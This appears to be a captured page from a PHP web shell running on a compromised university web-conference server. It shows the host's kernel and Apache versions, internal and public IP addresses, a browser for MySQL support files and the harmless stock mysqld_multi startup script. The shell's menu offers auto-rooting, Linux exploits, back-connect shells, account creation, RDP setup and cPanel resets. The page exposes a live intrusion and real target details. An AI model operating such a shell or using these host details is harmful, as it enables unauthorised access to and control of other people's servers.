Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.144.254.149
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
mysql /
[ HOME SHELL ]
Name
Size
Permission
Action
bulgarian
[ DIR ]
drwxr-xr-x
charsets
[ DIR ]
drwxr-xr-x
czech
[ DIR ]
drwxr-xr-x
danish
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
dutch
[ DIR ]
drwxr-xr-x
english
[ DIR ]
drwxr-xr-x
estonian
[ DIR ]
drwxr-xr-x
french
[ DIR ]
drwxr-xr-x
german
[ DIR ]
drwxr-xr-x
greek
[ DIR ]
drwxr-xr-x
hungarian
[ DIR ]
drwxr-xr-x
italian
[ DIR ]
drwxr-xr-x
japanese
[ DIR ]
drwxr-xr-x
korean
[ DIR ]
drwxr-xr-x
norwegian
[ DIR ]
drwxr-xr-x
norwegian-ny
[ DIR ]
drwxr-xr-x
polish
[ DIR ]
drwxr-xr-x
portuguese
[ DIR ]
drwxr-xr-x
romanian
[ DIR ]
drwxr-xr-x
russian
[ DIR ]
drwxr-xr-x
serbian
[ DIR ]
drwxr-xr-x
slovak
[ DIR ]
drwxr-xr-x
spanish
[ DIR ]
drwxr-xr-x
swedish
[ DIR ]
drwxr-xr-x
ukrainian
[ DIR ]
drwxr-xr-x
debian_create_root_user.sql
1.79
KB
-rw-r--r--
dictionary.txt
24.98
KB
-rw-r--r--
echo_stderr
27
B
-rwxr-xr-x
innodb_memcached_config.sql
3.91
KB
-rw-r--r--
install_rewriter.sql
2.21
KB
-rw-r--r--
mysql-log-rotate
1.98
KB
-rw-r--r--
mysql-systemd-start
2.09
KB
-rwxr-xr-x
mysqld_multi.server
1.04
KB
-rwxr-xr-x
uninstall_rewriter.sql
1.27
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysqld_multi.server
#!/bin/sh # # A simple startup script for mysqld_multi by Tim Smith and Jani Tolonen. # This script assumes that my.cnf file exists either in /etc/my.cnf or # /root/.my.cnf and has groups [mysqld_multi] and [mysqldN]. See the # mysqld_multi documentation for detailed instructions. # # This script can be used as /etc/init.d/mysql.server # # Comments to support chkconfig on RedHat Linux # chkconfig: 2345 64 36 # description: A very fast and reliable SQL database engine. # # Version 1.0 # basedir=/usr/local/mysql bindir=/usr/local/mysql/bin if test -x $bindir/mysqld_multi then mysqld_multi="$bindir/mysqld_multi"; else echo "Can't execute $bindir/mysqld_multi from dir $basedir"; exit; fi case "$1" in 'start' ) "$mysqld_multi" start $2 ;; 'stop' ) "$mysqld_multi" stop $2 ;; 'report' ) "$mysqld_multi" report $2 ;; 'restart' ) "$mysqld_multi" stop $2 "$mysqld_multi" start $2 ;; *) echo "Usage: $0 {start|stop|report|restart}" >&2 ;; esac
Close